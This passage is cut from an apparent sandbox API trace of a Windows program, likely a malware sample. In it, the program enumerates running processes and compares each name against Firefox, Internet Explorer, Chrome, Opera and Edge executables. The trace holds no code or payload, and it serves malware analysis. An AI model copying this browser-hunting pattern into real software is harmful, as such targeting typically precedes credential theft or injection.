pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0226.537] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0226.537] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0226.537] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0226.537] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0226.537] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.537] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0226.537] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0226.537] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0226.537] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0226.537] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0226.537] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.538] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0226.538] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0226.538] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0226.538] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0226.538] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0226.538] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.538] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.539] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.539] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.539] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.539] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0226.539] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.539] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0226.539] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0226.539] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0226.539] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0226.539] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0226.539] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.539] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0226.540] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0226.540] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0226.540] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0226.540] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0226.540] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.540] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0226.540] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0226.540] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0226.540] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0226.540] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0226.540] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.540] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0226.541] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0226.541] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0226.541] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0226.541] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0226.541] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.541] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0226.541] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0226.541] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0226.541] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0226.542] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0226.542] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.542] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0226.542] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0226.542] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0226.542] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0226.542] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0226.542] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.542] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0226.543] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0226.543] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0226.543] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0226.543] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0226.543] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.543] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0226.543] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0226.543] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0226.543] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0226.543] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0226.543] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.543] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0226.544] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0226.544] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0226.544] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0226.544] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0226.544] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.544] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0226.544] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0226.544] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0226.544] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0226.545] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0226.545] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.545] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0226.545] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0226.545] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0226.545] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0226.545] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0226.545] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.545] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0226.546] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0226.546] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0226.546] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0226.546] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0226.546] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.546] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0226.546] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0226.546] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0226.546] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0226.546] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0226.546] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.546] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0226.547] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0226.547] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0226.547] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0226.547] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0226.547] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.547] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0226.547] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0226.547] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0226.547] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0226.547] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0226.547] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.547] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0226.548] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0226.548] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0226.548] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0226.548] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0226.548] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.548] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0226.549] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0226.549] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0226.549] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0226.549] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0226.549] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.549] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0226.549] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0226.549] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0226.549] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0226.549] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0226.549] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.549] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0226.550] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0226.550] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0226.550] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0226.550] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0226.550] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.550] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0226.550] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0226.550] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0226.550] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0226.550] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0226.550] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.550] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0226.551] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0226.551] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0226.551] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0226.551] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0226.551] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.551] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0226.551] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0226.551] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0226.551] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0226.551] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0226.552] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.552] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.552] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0226.552] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0226.552] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0226.552] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0226.552] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.552] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.553] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.553] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.553] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.553] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0226.553] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.553] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0226.580] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0226.580] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0226.580] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0226.580] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0226.580] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.580] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.581] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0226.581] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0226.581] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0226.581] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0226.581] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.581] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0226.581] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0226.581] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0226.581] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0226.581] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0226.581] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.581] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.582] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0226.582] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0226.582] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0226.582] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0226.582] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.582] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0226.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0226.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0226.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0226.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0226.583] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.583] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.584] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0226.584] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0226.584] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0226.584] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0226.584] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0226.584] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.584] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0226.585] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0226.585] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0226.585] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0226.585] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.585] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.585] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0226.585] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0226.585] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0226.585] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0226.585] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.585] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.586] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0226.586] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") 